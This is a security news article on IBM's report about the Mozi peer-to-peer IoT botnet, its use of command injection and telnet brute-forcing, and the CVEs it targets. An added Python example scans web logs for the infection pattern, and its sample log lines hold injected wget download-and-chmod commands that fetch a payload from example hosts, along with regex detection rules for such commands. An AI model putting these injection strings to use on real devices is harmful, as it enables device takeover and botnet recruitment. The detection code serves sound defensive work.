Mozi Botnet Accounted for Majority of IoT Traffic: IBM

Mozi, a relatively new botnet, has fueled a significant increase in Internet of Things (IoT) botnet activity, IBM reported this week.

Mozi shows code overlaps with Mirai and its variants and reuses Gafgyt code. It has been highly active over the past year and accounted for 90% of the IoT network traffic observed between October 2019 and June 2020, although it did not attempt to remove competitors from compromised systems, IBM researchers say.

The large increase in IoT attacks, however, might also be the result of a higher number of IoT devices being available worldwide, thus expanding the attack surface. At the moment, IBM notes, there are around 31 billion IoT devices worldwide, with approximately 127 devices being deployed each second.

IBM suggests that Mozi’s success is based on the use of command injection (CMDi) attacks, which rely on misconfigurations in IoT devices. The increased use of IoT and poor configuration protocols are believed to be responsible for the spike, along with the increase in remote work due to COVID-19.

Almost all of the observed attacks targeting IoT devices were employing CMDi for initial access. Mozi leverages CMDi by using a “wget” shell command and then tampering with permissions to facilitate the attackers’ interaction with the affected system.

On vulnerable devices, a file called “mozi.a” was downloaded and then executed on MIPS architecture. The attack targets machines running reduced instruction set computer (RISC) architecture — MIPS is a RISC instruction set architecture — and can provide an adversary with the ability to modify the firmware to plant additional malware.
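The behavior described above (an injected “wget” download followed by a permission change) leaves a recognizable trace in web or gateway request logs. The following is an added example, not code from IBM or from the original article: the log lines, paths and rule names are constructed for illustration, and the regular expressions are this example's assumptions about how such a request looks once URL-decoded.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed access-log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jun/2020:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jun/2020:10:00:05 +0000] "GET /cgi-bin/example.cgi?host=%3Bwget+http%3A%2F%2F192.0.2.44%2FMozi.a+-O+%2Ftmp%2Fx%3Bchmod+777+%2Ftmp%2Fx HTTP/1.1" 200 0',
    '198.51.100.8 - - [01/Jun/2020:10:00:09 +0000] "GET /downloads/wget-manual.pdf HTTP/1.1" 200 9000',
    '203.0.113.10 - - [01/Jun/2020:10:00:12 +0000] "POST /example/apply?name=%60wget%20http://192.0.2.45/m%60 HTTP/1.1" 404 0',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+"')

# Heuristics (assumptions of this example), applied to the decoded request target.
RULES = [
    # A shell metacharacter directly introducing a downloader that takes arguments.
    ("injected-download",
     re.compile(r'(?:[;|&`\n]|\$\()\s*(?:wget|curl|tftp)(?:\s|\$\{IFS\})', re.I)),
    # The permission tampering step that follows the download.
    ("permission-change", re.compile(r'\bchmod\s+(?:\+x|[0-7]{3,4})\b', re.I)),
    # The payload file name reported for this botnet.
    ("mozi-filename", re.compile(r'\bmozi\.[a-z0-9]+\b', re.I)),
]

def classify(line):
    """Return (source_ip, [names of matching rules]) or None if unparseable."""
    m = REQUEST.match(line)
    if not m:
        return None
    src, target = m.groups()
    # Decode twice so double-encoded input is still seen; the second pass
    # leaves a literal '+' alone so "chmod +x" survives.
    target = unquote(unquote_plus(target))
    return src, [name for name, rx in RULES if rx.search(target)]

def scan(lines):
    """Keep only the requests that triggered at least one rule."""
    results = (classify(line) for line in lines)
    return [r for r in results if r and r[1]]

if __name__ == "__main__":
    for src, findings in scan(SAMPLE_LOG):
        print(src, ",".join(findings))
```

A request that matches several rules at once is a much stronger signal than a single match, and the benign `wget-manual.pdf` download shows why matching on the bare word “wget” would be too noisy.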

Mozi targets many vulnerabilities for infection purposes: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 / CVE-2018-10562 (GPON Routers), CVE-2014-8361 (Realtek SDK), CVE-2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link Devices), Eir D1000 wireless router command injection, Netgear setup.cgi unauthenticated RCE, MVPower DVR command execution, D-Link UPnP SOAP command execution, and RCE impacting multiple CCTV-DVR vendors.

The threat, which leverages an infrastructure primarily located in China (84%), is also capable of brute-forcing telnet credentials, for which it uses a hardcoded list.

“The Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can spread via IoT device exploits and weak telnet passwords,” IBM says.

The malware uses ECDSA384 (elliptic curve digital signature algorithm 384) to check its integrity and contains a set of hardcoded DHT public nodes that can be leveraged to join the P2P network.

The botnet can be used to launch distributed denial of service (DDoS) attacks (HTTP, TCP, UDP) and command execution attacks, to fetch and execute additional payloads, and to gather bot information.

“As newer botnet groups, such as Mozi, ramp up operations and overall IoT activity surges, organizations using IoT devices need to be cognizant of the evolving threat. IBM is increasingly seeing enterprise IoT devices under fire from attackers. Command injection remains the primary infection vector of choice for threat actors, reiterating how important it is to change default device settings and use effective penetration testing to find and fix gaps in the armor,” IBM concludes.


Ionut Arghire is an international correspondent for SecurityWeek.
